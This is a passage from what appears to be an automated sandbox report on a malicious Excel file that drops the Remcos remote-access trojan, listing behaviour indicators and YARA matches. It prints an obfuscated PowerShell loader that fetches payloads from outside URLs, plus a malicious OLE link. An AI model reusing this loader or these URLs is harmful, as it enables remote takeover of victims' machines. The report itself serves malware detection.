gTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 28_2_004180EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 28_2_004132D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle, 28_2_0041BB09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle, 28_2_0041BB35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 29_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00401806 NtdllDefWindowProc_W, 29_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004018C0 NtdllDefWindowProc_W, 29_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004016FD NtdllDefWindowProc_A, 30_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004017B7 NtdllDefWindowProc_A, 30_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00402CAC NtdllDefWindowProc_A, 31_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00402D66 NtdllDefWindowProc_A, 31_2_00402D66
Contains functionality to shutdown / reboot the system
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 28_2_004167B4
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_002954A0 18_2_002954A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00295130 18_2_00295130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0043E0CC 28_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041F0FA 28_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00454159 28_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00438168 28_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004461F0 28_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0043E2FB 28_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0045332B 28_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0042739D 28_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004374E6 28_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0043E558 28_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00438770 28_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004378FE 28_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00433946 28_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0044D9C9 28_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00427A46 28_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041DB62 28_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00427BAF 28_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00437D33 28_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00435E5E 28_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00426E0E 28_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0043DE9D 28_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00413FCA 28_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00436FEA 28_2_00436FEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_10017194 28_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_1000B5C1 28_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044B040 29_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0043610D 29_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00447310 29_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044A490 29_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040755A 29_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0043C560 29_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044B610 29_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044D6C0 29_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004476F0 29_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044B870 29_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044081D 29_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00414957 29_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004079EE 29_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00407AEB 29_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044AA80 29_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00412AA9 29_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00404B74 29_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00404B03 29_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0044BBD8 29_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00404BE5 29_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00404C76 29_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00415CFE 29_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00416D72 29_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00446D30 29_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00446D8B 29_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00406E8F 29_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00405038 30_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0041208C 30_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004050A9 30_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0040511A 30_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0043C13A 30_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004051AB 30_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00449300 30_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0040D322 30_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0044A4F0 30_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0043A5AB 30_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00413631 30_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00446690 30_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0044A730 30_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004398D8 30_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004498E0 30_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0044A886 30_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0043DA09 30_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00438D5E 30_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00449ED0 30_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0041FE83 30_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00430F54 30_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004050C2 31_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004014AB 31_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00405133 31_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004051A4 31_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00401246 31_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_0040CA46 31_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00405235 31_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_004032C8 31_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00401689 31_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00402F60 31_2_00402F60
Document contains embedded VBA macros
Source: INQUIRY#46789.xla.xlsx OLE indicator, VBA macros: true
Document embeds suspicious OLE2 link
Source: INQUIRY#46789.xla.xlsx Stream path 'MBD00539CB4/\x1Ole' : http://pop.tg/D1ae4Vl?7#@(*rw&d-^r/,5ZUa,<[kG3OtkcilOGa2e64EgTePnxu8rPTCKIQe6geEzuPwjzsZBGqu3WBCnXWKhtHQqJu4J21yQicSM7TYO5peNh4EfbAVU6MQRC13nV42RSqLBmNKFfgVyuDrG4pvqpYZ2wTCoHwXCOcvZcReds8aNSDoGSdguLR9LC4AIaU8zclNIKw3HG4xdiDhGN0641Ll9+E+$>Py.vb]7-}ZH
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{22E766A3-CA3D-4B6F-BED5-FF71E53845DC}.tmp.4.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00416760 appears 69 times
Yara signature match
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.powershell.exe.4529110.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.powershell.exe.4529110.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.1113827756.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
